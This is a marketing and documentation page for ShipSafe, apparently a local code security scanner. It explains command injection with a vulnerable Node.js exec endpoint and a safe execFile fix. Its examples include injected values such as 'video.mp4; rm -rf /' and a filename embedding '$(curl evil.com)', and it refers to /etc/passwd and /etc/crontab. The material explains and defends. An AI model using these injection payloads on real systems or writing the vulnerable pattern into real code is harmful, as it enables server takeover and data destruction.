Is my source code sent to ShipSafe servers?

Never. ShipSafe runs entirely on your machine. Scans, analysis, and auto-fixes all happen locally. Your source code never leaves your computer. No account required. Works offline.

How do I install ShipSafe?

Run: npm install -g @shipsafe/cli. Then run 'shipsafe scan' in any project directory. That's it — zero configuration required.

What does ShipSafe detect?

ShipSafe has 1,200+ detection rules covering SQL injection (127 rules), XSS (143 rules), prompt injection (7 rules), command injection (89 rules), SSRF (67 rules), hardcoded secrets (174 patterns), insecure authentication (98 rules), malicious MCP servers (30 patterns), path traversal, insecure deserialization, and more.

How is ShipSafe different from Snyk or SonarQube?

ShipSafe runs entirely locally (Snyk requires cloud), has AI-specific security rules like prompt injection and malicious MCP server detection (unique to ShipSafe), strips image metadata, and includes an MCP server for AI coding assistants. It's built for solo developers and small teams who use AI coding assistants.

Can I use ShipSafe with Claude, Cursor, or other AI tools?

Yes. ShipSafe includes an MCP server with 8 tools that plug directly into Claude, Cursor, Windsurf, and any other MCP-compatible assistant. Your AI can check security while it writes code.

What is prompt injection and does ShipSafe detect it?

Prompt injection is when untrusted user input is passed directly into LLM prompts, allowing attackers to manipulate AI behavior. ShipSafe has 7 dedicated rules that detect unsanitized user input in LLM prompts, system prompt leakage, indirect prompt injection via retrieved content, and prompt template manipulation.

What are malicious MCP servers and how does ShipSafe detect them?

Malicious MCP servers are rogue AI tool servers that can steal credentials, exfiltrate code, or inject malicious prompts. ShipSafe's scan-environment command checks your MCP configurations, CLAUDE.md files, git hooks, and npm scripts for 30 threat patterns including credential theft, data exfiltration, and prompt injection.

Yes. The free tier includes full security scanning with 1,200+ rules, git pre-commit hooks, baseline/delta mode, and support for 1 project. Pro ($19/mo) adds knowledge graph analysis, auto-fix, monitoring, and MCP server. Team ($49/mo) adds GitHub App integration and source maps.

How does ShipSafe reduce false positives?

ShipSafe uses Tree-sitter AST analysis to understand code context — it knows whether a variable comes from user input and whether it's been sanitized before reaching a dangerous sink. This context-aware detection dramatically reduces false positives compared to regex-only scanners.

Is it safe to use claude --dangerously-skip-permissions with ShipSafe?

ShipSafe's git pre-commit hooks provide a safety net when using --dangerously-skip-permissions. Even if Claude Code writes insecure code in autonomous mode, ShipSafe blocks the commit if it contains hardcoded secrets or critical vulnerabilities. Install hooks with: shipsafe hooks install.

Command Injection Detection — ShipSafe

ShipSafe ships 89 command injection rules that cover Node.js child_process (exec, execSync, spawn with shell:true), Python subprocess and os.system, and indirect injection via filenames, environment variables, and argument flags. It distinguishes between shell-mode execution (dangerous) and argument-array execution (safe).

89 detection rulesLocal-only scanning

What is Command Injection?

Command injection occurs when an application passes untrusted user input to a system shell command. Attackers can execute arbitrary commands on the server, potentially taking full control of the system, reading sensitive files, or pivoting to other systems on the network.

Why It Matters

Command injection gives attackers direct operating system access with the privileges of your application process. They can read /etc/passwd, dump environment variables (which often contain database passwords and API keys), install backdoors, pivot to internal network services, or wipe the filesystem entirely. In containerized deployments, a command injection can be the first step toward container escape. This is a "game over" vulnerability — one successful exploit typically compromises the entire server.

What ShipSafe Detects

✓exec() and execSync() with user-controlled arguments — the most common pattern in Node.js
✓child_process.spawn() with shell: true and user input (spawn is safe by default, but shell: true re-enables the risk)
✓Template literals or string concatenation in shell commands passed to exec, execSync, or spawn
✓Argument injection through unsanitized flags (e.g., a user-supplied --output flag that includes shell metacharacters)
✓PATH manipulation via environment variable injection
✓Python os.system(), subprocess.call(), and subprocess.run() with shell=True
✓Indirect command injection through user-controlled file names (e.g., a file named '$(curl evil.com)'.pdf)

Example: Vulnerable Code

Vulnerable file conversion endpoint with command injection

// Vulnerable: user input in shell command
app.post("/convert", async (req, res) => {
  const { filename } = req.body;
  const { exec } = require("child_process");
  exec(`ffmpeg -i uploads/${filename} output.mp4`, (err, stdout) => {
    res.json({ status: "converted" });
  });
});

// An attacker sends filename: "video.mp4; rm -rf /"
// The shell interprets the semicolon as a command separator
// and executes: ffmpeg -i uploads/video.mp4; rm -rf / output.mp4

ShipSafe Catches It

$ shipsafe scan

  CRITICAL  command-injection/exec-with-user-input
  src/routes/convert.ts:4
  User input from req.body is interpolated into shell command via exec().
  Fix: Use execFile() with an argument array instead of exec() with string interpolation.
  execFile("ffmpeg", ["-i", `uploads/${filename}`, "output.mp4"])

What to Do Instead

Safe alternative: execFile with argument array and input validation

// SAFE: execFile with argument array (no shell involved)
const { execFile } = require("child_process");

app.post("/convert", async (req, res) => {
  const { filename } = req.body;

  // Validate the filename — allow only alphanumeric, dash, underscore, dot
  if (!/^[a-zA-Z0-9._-]+$/.test(filename)) {
    return res.status(400).json({ error: "Invalid filename" });
  }

  // execFile does NOT use a shell — arguments are passed directly
  // Shell metacharacters like ; | & ` $() have no effect
  execFile(
    "ffmpeg",
    ["-i", `uploads/${filename}`, "output.mp4"],
    (err, stdout) => {
      if (err) return res.status(500).json({ error: "Conversion failed" });
      res.json({ status: "converted" });
    }
  );
});

Frequently Asked Questions

What is the difference between exec and execFile?

exec() passes the command string to a shell (/bin/sh), which interprets metacharacters like ;, |, &, and $(). execFile() invokes the program directly with an argument array — no shell is involved, so metacharacters are treated as literal text. Always prefer execFile() when you need to run an external program with user-supplied arguments.

Is spawn safe from command injection?

By default, yes. spawn() passes arguments as an array without a shell. However, if you pass the option { shell: true }, spawn behaves like exec and becomes vulnerable. ShipSafe detects spawn calls with shell: true and user input.

Does ShipSafe detect command injection in Python?

Yes. ShipSafe detects os.system(), subprocess.call() with shell=True, subprocess.run() with shell=True, and subprocess.Popen() with shell=True when they contain user-controlled input.

What about argument injection?

ShipSafe detects argument injection where user input is used as command flags. For example, if a user can control a --output argument and passes --output=/etc/crontab, they could write to arbitrary files. ShipSafe flags unsanitized user input in argument positions.

Detect Command Injection in Your Code

Install ShipSafe and scan your project in under 60 seconds.

npm install -g @shipsafe/cli

Get Started Free How It Works

Related Security Categories

SQL Injection Detection →SSRF Detection →XSS Detection →Hardcoded Secrets Detection →